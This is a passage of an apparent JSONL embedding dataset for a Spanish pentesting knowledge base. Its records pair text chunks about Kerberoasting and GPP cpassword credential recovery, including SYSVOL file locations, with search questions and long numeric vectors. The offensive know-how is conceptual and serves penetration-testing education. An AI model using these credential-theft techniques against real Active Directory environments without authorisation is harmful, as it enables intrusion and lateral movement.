OSCP MOC", "indexar": "que programa me sirve para probar la fuerza de una contraseΓ±a con Kerberos?", "v": [-0.03826, -0.02393, -0.15451, -0.20044, -0.05702, -0.11483, 0.02497, 0.06585, -0.00109, -0.24478, -0.03041, 0.08663, 0.03543, -0.11491, 0.03581, 0.02114, 0.06794, -0.08396, 0.04169, 0.14321, 0.1063, -0.01083, -0.03334, -0.108, -0.03012, 0.0001, 0.03882, -0.04407, -0.07085, -0.05497, -0.03361, 0.03855, 0.1224, -0.09325, 0.02808, 0.14566, -0.04808, 0.08449, 0.14488, 0.16502, 0.0644, 0.05191, -0.02095, 0.15529, -0.05037, 0.10426, -0.00207, 0.02702, 0.03301, 0.00924, -0.09428, -0.07447, 0.02874, -0.03796, -0.03729, -0.14149, -0.01013, -0.07507, -0.13525, 0.07068, -0.0982, -0.01954, -0.01156, 0.01149, -0.03009, -0.16381, 0.02278, -0.00771, -0.13004, 0.01761, -0.10154, 0.0159, -0.05397, -0.01429, -0.08108, 0.04099, 0.04335, -0.03331, 0.01393, 0.02394, -0.10857, 0.01016, -0.05878, 0.07289, -0.04841, -0.07474, 0.09636, -0.00987, -0.00287, -0.06897, 0.08091, 0.01397, 0.01523, 0.09014, 0.00365, -0.05427, 0.02475, 0.04332, -0.01328, -0.05618, 0.06384, -0.06829, -0.05603, 0.05825, -0.01484, -0.01454, 0.00643, 0.02297, -0.02421, -0.00021, 0.04257, -0.02187, -0.08702, -0.01944, -0.08751, 0.00906, -0.09465, -0.12607, 0.00267, 0.03061, -0.09047, -0.00178, -0.07083, 0.02026, 0.02818, 0.05923, 0.01088, 0.08753, -0.04034, -0.00399, 0.05379, 0.0654, 0.01299, 0.0175, -0.02362, -0.03281, -0.0119, -0.11747, -0.09926, -0.06651, 0.04245, 0.08931, 0.04027, -0.04455, 0.04286, 0.05307, 0.04102, 0.01287, -0.03791, 0.06219, -0.04814, -0.02415, 0.01005, 0.07948, -0.09618, -0.02094, 0.03162, -0.07294, -0.04325, 0.09233, -0.0958, -0.03456, -0.09009, 0.01105, 0.00452, -0.06107, -0.04646, 0.00541, 0.07628, 0.0823, -0.00674, 0.06535, 0.05869, -0.00871, -0.00601, -0.00947, 0.02177, -0.04115, -0.04957, -0.03433, -0.0434, 0.02545, 0.02828, 0.02307, -0.01448, -0.0631, 0.03786, 0.00397, 0.01809, -0.04361, 0.04337, 0.01866, -0.02893, 0.05948, -0.03124, -0.00832, -0.03121, -0.03353, 0.02517, -0.06679, -0.05891, -0.03864, -0.01114, -0.03064, 0.05356, 0.0688, -0.03723, -0.01049, 0.00977, 0.02392, 0.04435, -0.04779, 0.08577, -0.03607, -0.05847, -0.08781, 0.01535, 0.06173, -0.01434, 0.03719, 0.01932, 0.06188, 0.04766, 0.07866, -0.00098, -0.03492, 0.02805, -0.01681, 0.02701, 0.01648, -0.02792, -0.0174, -0.03821, 0.00241, 0.07303, -0.02171, -0.0505, -0.02055, -0.08646, -0.08941, -0.06349, 0.07236, 0.00187, -0.10877, -0.06189, -0.01871, -0.06048, -0.01149, -0.00291, 0.03125, -0.05627, 0.00857, 0.04123, -0.03665, 0.03121, 0.01124]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· OSCP MOC", "indexar": "cual es una herramienta para simular un crackeo de credenciales en entornos corporativos?", "v": [0.01159, -0.01902, -0.1088, -0.07668, 0.12064, -0.20775, -0.02906, 0.0825, 0.02703, -0.11377, -0.09171, 0.01528, -0.0402, -0.11107, 0.05399, 0.0749, 0.003, -0.07901, -0.05722, 0.07221, -0.01958, -0.10775, -0.11547, 0.01637, -0.01982, -0.01987, -0.06303, 0.01672, -0.10943, 0.013, 0.03995, 0.11559, 0.10771, -0.09226, -0.04815, -0.08177, -0.09738, 0.00911, 0.04783, 0.12996, 0.04392, 0.00034, -0.06414, -0.03452, 0.09349, 0.02603, -0.10203, -0.00741, -0.01861, -0.0287, -0.10287, -0.14352, -0.11711, -0.04996, 0.04063, -0.13439, 0.2213, -0.11792, 0.0918, -0.14591, -0.10138, 0.03791, -0.00302, -0.0099, -0.04988, -0.01831, 0.07112, -0.05331, -0.05355, 0.01643, -0.01425, -0.05138, 0.06597, -0.06135, 0.02229, -0.03464, -0.05486, -0.01934, 0.02506, 0.03588, 0.08523, -0.03652, 0.05995, 0.05981, -0.1191, -0.00098, 0.05734, 0.074, 0.03651, 0.00933, -0.10516, 0.06414, -0.01195, 0.05611, -0.00545, -0.0189, 0.11267, -0.03295, -0.0331, 0.05182, 0.04541, -0.09402, -0.17232, 0.06475, -0.10315, 0.06324, -0.07688, -0.0534, -0.02462, -0.0157, 0.08531, 0.05273, 0.00568, 0.11402, 0.06859, 0.02454, 0.03244, -0.09473, 0.0855, -0.08884, 0.05012, -0.01823, -0.00485, -0.01767, -0.08138, 0.07961, -0.05721, 0.03725, -0.03958, -0.11291, -0.06397, -0.04038, -0.10966, 0.06308, -0.02759, -0.08097, 0.07708, -0.08076, 0.0028, -0.07388, 0.01282, 0.04657, 0.00328, -0.06675, 0.03713, 0.06758, 0.00517, -0.03842, 0.01233, 0.05748, 0.00534, 0.05936, -0.03639, 0.02395, -0.1049, -0.01003, 0.01954, 0.03548, -0.03121, 0.04789, -0.02987, -0.03081, 0.07987, 0.03793, -0.02192, -0.05551, 0.08916, -0.04512, 0.00322, 0.08263, -0.01199, 0.01129, 0.03457, -0.01497, 0.05737, -0.01688, -0.04323, -0.05314, -0.04402, -0.09861, 0.02808, 0.01556, 0.00215, 0.00507, -0.03028, -0.02547, 0.01616, 0.01191, -0.02181, 0.0243, 0.01206, 0.02349, 0.02278, -0.05058, 0.07797, 0.03789, 0.03597, -0.04069, -0.00584, -0.01684, -0.05167, -0.05754, -0.03409, -0.06704, 0.07098, 0.12003, 0.02588, 0.02691, -0.01425, 0.09759, 0.04666, -0.02317, 0.00948, 0.00109, -0.0454, -0.05052, 0.03497, 0.02977, -0.01189, -0.0157, 0.01445, -0.00799, 0.05698, -0.03511, -0.08226, 0.01323, -0.00419, 0.06105, -0.03314, -0.00687, 0.04396, -0.01038, 0.01855, -0.01183, 0.00298, 0.00163, 0.06189, -0.02894, -0.06078, -0.068, -0.01531, 0.05861, 0.00323, -0.03999, -0.07456, 0.00074, -0.0762, -0.03205, -0.00588, -0.06916, -0.05069, 0.0184, 0.07243, -0.04278, 0.03633, -0.02912]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· OSCP MOC", "indexar": "con que puedo realizar un ataque AS-REP Roasting contra un servicio?", "v": [-0.14864, -0.03466, -0.11437, -0.06423, 0.07373, 0.07355, 0.06798, 0.06307, -0.05411, 0.14122, -0.15245, -0.1837, 0.09069, -0.02996, 0.28763, -0.01905, -0.11615, 0.18531, 0.00676, 0.11697, -0.02533, -0.14011, -0.02653, 0.1418, 0.14968, 0.16968, 0.08086, 0.0595, -0.00097, -0.0704, -0.01361, -0.0791, -0.04825, 0.0474, -0.02924, -0.05239, 0.00279, 0.12648, 0.1527, 0.09834, -0.0028, -0.07235, -0.22418, 0.02004, 0.01296, 0.00126, 0.02283, -0.04224, -0.03751, 0.10308, 0.01901, -0.0123, -0.16345, -0.1101, -0.05398, 0.02939, 0.01929, -0.09548, -0.07333, -0.0546, -0.00669, 0.04102, 0.01345, -0.05846, 0.11153, -0.03323, -0.0939, -0.07107, 0.03571, -0.01389, -0.07165, 0.01337, -0.03659, -0.01338, -0.0326, 0.0041, -0.01789, 0.04975, 0.00059, -0.01611, -0.02041, -0.00514, -0.15006, 0.04451, 0.02381, -0.01052, 0.0128, -0.09216, -0.01167, -0.11947, 0.05982, 0.0552, -0.0459, 0.02522, -0.06846, -0.01782, -0.03785, -0.07042, -0.00731, -0.05882, 0.02623, -0.00754, -0.04936, 0.05481, 0.02492, -0.02137, 0.00173, -0.0155, 0.04043, -0.12061, -0.04858, -0.05946, -0.05353, -0.0643, -0.0141, -0.06805, -0.0939, 0.00588, 0.06012, 0.06498, -0.0599, 0.00641, 0.03461, 0.07641, 0.02144, 0.04569, 0.02072, -0.01036, -0.03431, -0.02373, 0.00825, 0.03349, 0.0004, 0.00935, 0.00732, -0.01372, -0.0127, -0.09119, -0.00176, -0.00689, 0.02808, 0.06092, 0.01648, 0.07292, -0.03843, -0.02368, -0.02097, -0.06551, -0.0585, 0.05587, 0.01372, -0.00618, -0.03423, 0.11091, -0.05689, -0.02995, -0.00212, -0.02057, -0.01953, 0.14902, -0.03948, 0.00561, -0.01557, 0.03862, 0.02862, 0.00602, -0.01825, -0.06463, 0.09906, -0.01811, -0.03963, 0.00893, -0.02271, -0.05387, 0.00598, 0.02945, -0.03452, -0.01513, 0.04368, -0.00709, -0.00091, -0.09487, -0.01391, 0.05269, -0.05915, -0.02192, -0.00585, 0.03913, 0.02264, -0.04618, 0.00996, -0.00662, 0.03456, 0.01345, 0.03594, -0.07073, -0.02273, 0.01811, -0.06836, 0.02738, -0.03786, -0.00857, -0.05983, -0.03833, 0.017, 0.01772, 0.0089, -0.01094, -0.01043, 0.03591, -0.00946, 0.00598, 0.10423, -0.05928, -0.06555, 0.00721, 0.06216, -0.02427, -0.01118, 0.04041, 0.04362, -0.02977, 0.02896, 0.05559, -0.01471, 0.01712, 0.00372, -0.03259, 0.01214, 0.00712, 0.02586, -0.06141, 0.00628, -0.05338, -0.02045, -0.02222, 0.01774, -0.0257, -0.04342, 0.03317, 0.01055, -0.00899, -0.04752, 0.00254, 0.02849, -0.01319, -0.08509, -0.02325, 0.01803, -0.03318, 0.00902, 0.05312, 0.00021, 0.00456, 0.0726, -0.01777]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": "que programa sirve para desbloquear grupos de polΓ­ticas con contraseΓ±as", "v": [0.2424, 0.01273, -0.1197, -0.18909, 0.00628, -0.12029, 0.04097, -0.121, -0.07036, -0.06576, 0.04113, 0.03345, -0.0558, -0.1227, 0.03057, -0.01162, 0.00121, -0.05136, 0.07373, 0.05948, -0.01968, -0.11734, -0.00484, 0.0091, -0.08111, -0.04657, -0.01637, -0.01441, -0.08077, 0.00038, -0.06445, -0.11045, 0.04403, -0.08059, 0.03515, 0.08517, 0.04626, 0.10489, 0.06069, 0.04219, 0.01131, -0.06712, -0.11461, -0.00185, 0.00772, 0.00713, 0.04002, 0.04577, 0.06648, -0.06284, -0.03604, -0.01525, -0.03552, -0.05771, 0.01483, -0.0766, 0.02262, 0.0168, -0.15697, 0.0722, -0.16649, 0.03251, 0.07543, 0.0198, -0.00722, -0.0298, 0.09302, 0.06279, -0.04895, 0.13705, -0.02091, -0.05876, 0.00741, 0.03354, -0.02319, 0.02304, 0.01764, -0.02819, 0.0653, 0.10428, 0.01678, 0.00957, 0.04984, 0.07202, -0.07998, 0.04398, 0.08232, 0.05219, -0.0307, -0.05706, 0.02418, 0.06709, 0.03836, 0.04879, 0.02762, -0.06604, 0.08331, 0.16009, 0.05297, 0.00917, 0.07372, -0.0924, -0.05588, 0.1467, -0.01485, 0.04803, 0.09681, -0.04856, 0.02504, 0.01222, 0.017, -0.03325, -0.02361, -0.05072, -0.00842, -0.00179, -0.0304, -0.0402, 0.04595, -0.06082, -0.15003, 0.04055, -0.10927, 0.05086, 0.09373, 0.07696, 0.05886, 0.0782, -0.06656, 0.03876, -0.00527, 0.0183, -0.01327, 0.04878, -0.12293, -0.03522, 0.00631, -0.09676, -0.01839, -0.02741, 0.08657, 0.07473, 0.06455, -0.01088, 0.08864, 0.03659, 0.04444, -0.00847, -0.01029, 0.04347, 0.09011, 0.01784, 0.01865, 0.06345, -0.08892, -0.02824, -0.07459, -0.09709, -0.05915, 0.08102, -0.05879, -0.06074, -0.07733, -0.0157, 0.0013, -0.03221, -0.03197, -0.01153, 0.08731, 0.09297, 0.017, 0.04701, 0.12324, -0.05958, -0.03818, -0.03356, -0.02011, -0.10859, 0.01529, -0.00344, -0.09601, 0.04392, 0.04522, -0.03956, -0.00589, -0.08319, -0.0147, 0.00887, 0.04005, -0.02562, -0.03738, -0.04053, -0.0385, 0.07842, -0.06738, -0.03834, -0.01054, -0.01565, 0.00297, -0.09223, 0.00098, -0.03519, -0.01537, -0.03018, 0.00901, 0.07538, -0.05349, -0.02401, 0.02869, 0.10943, 0.06679, -0.03148, 0.06977, 0.02159, -0.071, -0.07821, -0.05005, 0.02482, 0.04156, 0.05214, -0.01214, 0.0497, 0.04208, 0.06686, 0.02876, -0.08706, -0.00077, 0.01072, 0.07566, 0.01472, 0.00339, 0.04588, -0.02789, 0.01789, 0.09907, 0.02008, -0.03853, -0.04662, -0.01685, -0.03257, -0.00087, 0.03975, 0.00474, -0.09152, -0.03987, -0.05963, -0.06741, 0.03513, 0.02307, -0.04349, -0.05251, 0.04476, 0.04569, 0.03545, 0.05632, -0.01946]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": "con que puedo leer contraseΓ±as cifradas con AES pΓΊblico en Active Directory", "v": [-0.00348, 0.08098, -0.05138, -0.20181, 0.05977, -0.05517, -0.0345, -0.03337, -0.20518, 0.02806, 0.0488, -0.04262, -0.12557, -0.12909, 0.14786, -0.13461, 0.08303, -0.05483, 0.04004, 0.06412, 0.08515, 0.01128, -0.14235, 0.04998, 0.1063, 0.00946, 0.02857, 0.01439, 0.00323, -0.02657, -0.05376, 0.04578, 0.07484, 0.04978, 0.10678, 0.07375, -0.07743, 0.09548, 0.04561, 0.1067, 0.01152, 0.11198, -0.11635, 0.01813, 0.06341, 0.04302, 0.00046, 0.00167, -0.01178, 0.03263, -0.13295, -0.08506, -0.06084, -0.08576, -0.04138, -0.0263, 0.04166, 0.05833, -0.14122, -0.05627, -0.10933, -0.00566, -0.00606, 0.02946, -0.06412, -0.12755, 0.1593, 0.00232, -0.11213, 0.03981, 0.02366, 0.06997, -0.14488, 0.12775, 0.05277, -0.02005, 0.0222, -0.07759, -0.08213, 0.14457, -0.00953, -0.08881, 0.04703, -0.01119, -0.07917, -0.01002, -0.04648, -0.02465, 0.09599, 0.01746, 0.06908, 0.10459, -0.02617, 0.04786, -0.06528, 0.0565, 0.03596, 0.06936, -0.1082, -0.03838, -0.03573, 0.03114, 0.00489, 0.07554, 0.00283, 0.08731, -0.03893, 0.06708, 0.02504, 0.03167, 0.03324, -0.04871, -0.03099, -0.10413, 0.03026, 0.04704, 0.02384, -0.07929, 0.08485, 0.06406, -0.07421, -0.07462, 0.04854, -0.01311, 0.04425, 0.10224, -0.00828, -0.03559, -0.00361, -0.08332, 0.03615, 0.05628, -0.00129, -0.03096, -0.01089, 0.04325, -0.05966, -0.04645, -0.03085, -0.03559, -0.00048, -0.01715, 0.02666, -0.00824, 0.01786, -0.02548, 0.08255, -0.00179, -0.10398, 0.01659, 0.04136, 0.01656, 0.02968, 0.07189, -0.01451, 0.07053, -0.00153, -0.04998, -0.00679, 0.13425, 0.02615, -0.01675, -0.04495, 0.02354, -0.07031, 0.00243, -0.1038, -0.03343, 0.09292, 0.05047, -0.03259, 0.06234, 0.021, -0.07524, 0.02663, -0.06252, -0.03003, -0.05891, 0.03343, -0.076, 0.00532, -0.02337, -0.08465, -0.0155, 0.02678, -0.05188, 0.05374, -0.04899, -0.03397, -0.00776, 0.05582, 0.03874, -0.01068, -0.02384, 0.0009, -0.06752, -0.02193, 0.02514, 0.01367, -0.06741, 0.00566, 0.06895, -0.00853, -0.06706, 0.05717, 0.01809, -0.09833, 0.0449, -0.00679, 0.00014, 0.00885, -0.04731, 0.04246, -0.02262, -0.14794, 0.01386, -0.00723, 0.0027, -0.02832, 0.05621, 0.00422, 0.05864, 0.0858, -0.00519, 0.06345, -0.01528, -0.00486, 0.02091, 0.0569, 0.0655, -0.01918, 0.01563, 0.021, 0.02778, 0.04673, 0.03303, -0.0492, -0.06165, -0.09762, 0.03251, -0.01538, 0.07687, 0.00447, -0.00787, -0.04864, -0.02777, -0.06613, 0.02694, 0.03413, -0.0307, -0.03498, 0.01724, -0.00668, -0.0097, -0.00346, -0.05247]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": "cual es una herramienta para recuperar datos de GPP cpassword", "v": [-0.10932, 0.01377, -0.07156, -0.19117, 0.00758, -0.16825, 0.10683, -0.01342, -0.11037, 0.01841, -0.00791, -0.01294, -0.10728, 0.00189, -0.01901, 0.01389, 0.05151, -0.07273, -0.05039, 0.00875, -0.13246, 0.02633, 0.00454, -0.16534, -0.11055, 0.02437, 0.03616, -0.01913, -0.15601, 0.09676, 0.03168, -0.07085, -0.15338, -0.07022, -0.20205, 0.08042, 0.02997, 0.10976, -0.03742, 0.0097, -0.01133, -0.00737, -0.12272, 0.0932, 0.04476, -0.09589, 0.00219, 0.08809, -0.00633, -0.04689, -0.09352, -0.04215, -0.07143, -0.0705, -0.0456, -0.09857, 0.16892, -0.03199, -0.03638, -0.02398, -0.1041, 0.09632, -0.06039, 0.05936, -0.0272, -0.09003, 0.00628, 0.0055, -0.13245, 0.22663, -0.00805, 0.0455, 0.04057, -0.01363, 0.00711, -0.09239, 0.09865, 0.08129, 0.03209, 0.03716, 0.01344, -0.05704, -0.14079, 0.02261, -0.0543, -0.01806, 0.13291, 0.00884, 0.02857, -0.08101, -0.00392, 0.01969, -0.02494, 0.08405, -0.02432, -0.03147, -0.01084, -0.10228, -0.09706, -0.02317, 0.05731, 0.01785, -0.1152, 0.02898, 0.01147, 0.05155, -0.00019, 0.09504, -0.12858, -0.02065, 0.00505, 0.02583, 0.04965, 0.04509, 0.10846, 0.02532, -0.06236, -0.05391, -0.01462, 0.00477, 0.10968, 0.05509, -0.05377, -0.03639, -0.03842, 0.06541, 0.00685, 0.05287, -0.06025, -0.04649, 0.013, -0.00763, -0.05648, -0.05203, -0.0155, 0.03048, -0.00123, -0.07122, 0.01282, -0.08248, 0.02704, 0.03416, -0.03749, 0.00958, 0.038, 0.02583, 0.08645, 0.0161, -0.06281, -0.01775, 0.05348, 0.00208, 0.02642, 0.02867, -0.08828, 0.03457, -0.01905, -0.01108, -0.10282, 0.0158, -0.09101, -0.03018, 0.00079, 0.07011, 0.02294, -0.04043, 0.07895, 0.04158, 0.09016, -0.02386, -0.00414, -0.04282, 0.10189, -0.05353, 0.03574, -0.03263, -0.00692, -0.0666, 0.02167, -0.18208, 0.02861, 0.01181, 0.00628, -0.0123, 0.02462, -0.10179, 0.06218, -0.05079, -0.00328, -0.00355, -0.00871, 0.02491, 0.04803, -0.0937, 0.02746, 0.01692, -0.06059, 0.01157, 0.06861, -0.01228, -0.01546, 0.01949, -0.04551, 0.00877, 0.02212, -0.01281, 0.02946, -0.03908, -0.02196, -0.0433, 0.00298, -0.03353, 0.00983, -0.04849, -0.02581, -0.06433, -0.0391, 0.00014, -0.07067, -0.01426, -0.00475, 0.02457, 0.04756, 0.0125, -0.05545, -0.0362, 0.01092, -0.00241, -0.03024, -0.05686, 0.02371, -0.00034, -0.00499, 0.00729, 0.0282, -0.04747, -0.01189, -0.06006, -0.01864, -0.00291, 0.01545, 0.03524, -0.01757, -0.0017, -0.0193, 0.02463, 0.03456, 0.0122, -0.01995, -0.02353, -0.04625, -0.01909, 0.04165, -0.0465, -0.03234, -0.05436]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "como puedo buscar contraseΓ±as de grupos guardadas en el registro?", "v": [0.16651, 0.03986, -0.10848, -0.17869, -0.04863, -0.08516, 0.03833, -0.05716, -0.05114, -0.0951, 0.00536, 0.01216, -0.03119, -0.0762, 0.10393, 0.04834, 0.09138, 0.08649, 0.02167, 0.04601, -0.03021, -0.07209, 0.01281, 0.02656, -0.04621, -0.11734, 0.04705, -0.03445, -0.05211, 0.07391, -0.01283, -0.03136, -0.06196, -0.0047, -0.079, 0.08053, 0.0414, 0.09251, -0.02019, 0.0105, -0.00947, 0.08352, -0.17341, 0.00703, -0.0109, -0.0739, 0.01835, 0.0541, 0.03128, -0.04196, -0.05415, -0.04189, -0.13496, -0.07604, -0.07499, -0.11196, 0.14584, 0.00537, 0.04134, -0.00602, -0.1829, 0.06618, 0.02064, 0.12224, -0.06489, -0.06765, 0.16379, 0.06036, -0.08478, 0.04597, 0.02312, -0.04814, -0.08368, -0.06408, 0.04283, 0.03755, 0.1033, 0.00184, -0.01006, 0.11922, -0.09617, -0.00404, 0.07198, -0.02383, -0.13111, -0.03712, -0.01427, -0.01476, 0.00732, -0.07494, 0.15412, 0.00339, -0.03789, 0.04984, 0.04967, -0.02538, -0.00543, 0.05026, -0.03779, -0.01446, -0.02949, 0.07865, -0.03648, 0.16909, 0.01084, 0.04836, -0.01197, 0.00918, 0.08977, -0.04933, 0.03922, -0.01337, -0.0719, -0.02982, 0.06749, 0.00924, -0.00851, -0.04916, 0.11777, 0.02965, -0.00281, -0.0518, -0.07794, -0.03339, 0.08046, 0.04053, 0.03337, 0.04683, -0.02771, -0.00587, -0.01703, -0.00066, -0.11859, -0.01995, -0.03823, 0.07784, -0.10757, -0.00204, 0.02614, 0.00043, 0.02272, 0.01837, -0.01024, -0.11007, 0.0705, 0.08068, 0.01323, -0.03617, -0.04019, -0.02191, -0.00917, -0.02332, -0.03994, 0.09549, -0.03531, 0.09799, -0.05133, -0.1237, -0.03255, 0.0749, -0.009, -0.01611, -0.05052, -0.0417, -0.06034, -0.01359, -0.01126, -0.0001, 0.03362, 0.01948, -0.00314, 0.00304, 0.06435, -0.08287, 0.03557, -0.0094, -0.01646, -0.07138, 0.05282, -0.02277, -0.05037, -0.01667, -0.01313, -0.02389, 0.03529, -0.08878, 0.04445, 0.0349, 0.01281, -0.00543, 0.04109, -0.00094, -0.02587, 0.01884, -0.02626, -0.02288, -0.00042, 0.00087, -0.02728, -0.13838, -0.01112, -0.07048, -0.04797, -0.0128, 0.00126, -0.00361, -0.13774, -0.01206, 0.07107, 0.0283, 0.05659, -0.03159, 0.02266, -0.05786, -0.14145, -0.03866, -0.04247, 0.0045, -0.03526, 0.06043, 0.02051, 0.09182, 0.08641, 0.08027, 0.05098, -0.03278, -0.00792, 0.00939, 0.03048, 0.05093, -0.03209, 0.04225, -0.03145, 0.00115, 0.14991, 0.01658, -0.03949, -0.03771, -0.06056, 0.02463, 0.01015, 0.05624, -0.02475, -0.03028, -0.06472, -0.06289, -0.07307, 0.07451, 0.04941, -0.06454, -0.04589, -0.00247, 0.03816, -0.03037, 0.07671, -0.07903]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "que herramienta me sirve para extraer cpassword de Groups.xml?", "v": [0.10237, -0.0065, -0.14373, -0.17739, -0.03156, -0.1633, -0.0538, -0.02889, 0.02454, -0.10546, -0.12355, -0.05214, -4e-05, -0.09309, 0.0853, 0.02151, 0.13429, -0.10196, -0.05753, 0.04233, 0.00551, 0.04608, -0.14123, -0.16181, -0.10548, 0.03773, -0.01952, -0.04841, -0.13662, 0.13539, -0.03867, 0.02128, -0.03771, -0.11736, -0.07087, -0.05487, 0.01864, 0.06326, -0.07154, 0.01947, -0.04267, 0.01324, -0.11838, 0.0617, -0.00399, 0.00611, -0.00689, 0.09461, 0.00241, 0.05807, -0.04755, -0.08703, -0.18477, 0.02434, -0.09137, -0.07318, 0.16847, -0.09957, -0.04478, -0.04643, -0.05776, 0.05805, -0.086, -0.00253, -0.06423, -0.02131, 0.03016, -0.02015, -0.10941, 0.09569, -0.05114, -0.04426, 0.11456, -0.02556, -0.05907, -0.12898, 0.10352, 0.05631, 0.00603, 0.07402, 0.07129, -0.01457, -0.05663, -0.06986, 0.01701, -0.07199, 0.11367, -0.00867, 0.02988, -0.04765, 0.03433, 0.04871, -0.00473, -0.01176, 0.08079, -0.06781, 0.02313, 0.00774, -0.00284, -0.04647, 0.18031, -0.06788, -0.11196, 0.05609, -0.01884, 0.02502, 0.0293, 0.03109, -0.10363, -0.0054, 0.12001, -0.00495, 0.04943, 0.00925, 0.03074, 0.01017, -0.04977, -0.00831, -0.0171, 0.01725, 0.06798, -0.01459, -0.0435, -0.05862, -0.07507, -0.02124, -0.01, 0.07811, -0.03589, -0.11011, -0.04182, -0.01955, -0.05643, 0.05486, -0.00672, -0.07888, 0.0959, -0.08908, -0.01105, -0.02171, -0.00429, -0.04795, -0.06529, -0.03985, 0.00215, 0.01222, 0.01906, 0.03776, 0.00086, -0.03597, 0.02907, -0.08269, 0.0166, 0.05441, -0.08172, 0.00402, 0.0077, 0.03828, -0.10238, 0.05017, -0.08677, -0.1454, 0.08199, -0.05429, -0.01992, -0.01165, -0.01161, -0.01575, 0.05753, 0.06815, 0.06925, -0.02688, 0.11636, -0.03439, 0.00964, -0.042, -0.02457, 0.00888, 0.02998, -0.05016, -0.0435, 0.00364, 0.03396, 0.02391, 0.00832, -0.07327, 0.05316, 0.0073, -0.00857, 0.01061, -0.05437, 0.05761, -0.0037, -0.0821, -0.01775, 0.00623, -0.0146, -0.06394, 0.03925, -0.09821, 0.00792, 0.00402, -0.00727, -0.03316, 0.00404, 0.04694, 0.06951, -0.0055, -0.01198, 0.05816, 0.05213, 0.07442, -0.00019, 0.00576, -0.05508, -0.05346, 0.00674, 0.03801, -0.03787, 0.05668, -0.03061, 0.02055, 0.08173, 0.01976, 0.03188, 0.0337, -0.01445, -0.04577, 0.01356, -0.02243, 0.04695, -0.06544, -0.03448, 0.00045, 0.04139, -0.07959, -0.00273, -0.00774, -0.04627, -0.0182, 0.03271, -0.01524, 0.01561, -0.01135, -0.06732, -0.07312, 0.02962, -0.0037, -0.00986, -0.06395, -0.03801, -0.07018, 0.04668, 0.00054, 0.05764, 0.00031]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "cual es una alternativa libre a buscar atributos confidenciales en SYSVOL?", "v": [0.03717, -0.01232, -0.13548, -0.00439, 0.05316, -0.13832, -0.00396, -0.20412, -0.15294, 0.04769, 0.03304, -0.15711, 0.03888, 0.03086, 0.1811, 0.00603, 0.17181, -0.11416, -0.04567, 0.11131, 0.00794, -0.12572, -0.13728, -0.11399, -0.06722, -0.08653, 2e-05, 0.04173, -0.00201, 0.01743, 0.00786, -0.00655, 0.07112, 0.00284, 0.00804, 0.01684, 0.04037, 0.08854, -0.01833, -0.10494, 0.08872, -0.06845, -0.06294, 0.14734, 0.0014, -0.03835, -0.14592, 0.1067, -0.0722, 0.03695, 0.00485, -0.03809, -0.14583, -0.01055, 0.07864, -0.03928, 0.15318, -0.05626, 0.03622, 0.03861, -0.13517, 0.05368, 0.06194, 0.08461, 0.04473, -0.06514, 0.0043, -0.04756, -0.12347, 0.01388, 0.10159, -0.00229, -0.01183, -0.01609, -0.03281, 0.07277, -0.08366, 0.04849, 0.02545, 0.05222, -0.00408, -0.0513, -0.06153, 0.05858, -0.01306, -0.0756, 0.07602, -0.03738, 0.01204, -0.05413, 0.12873, 0.07798, -0.08176, 0.12287, -0.09384, 0.00814, 0.10791, 0.11345, -0.0387, 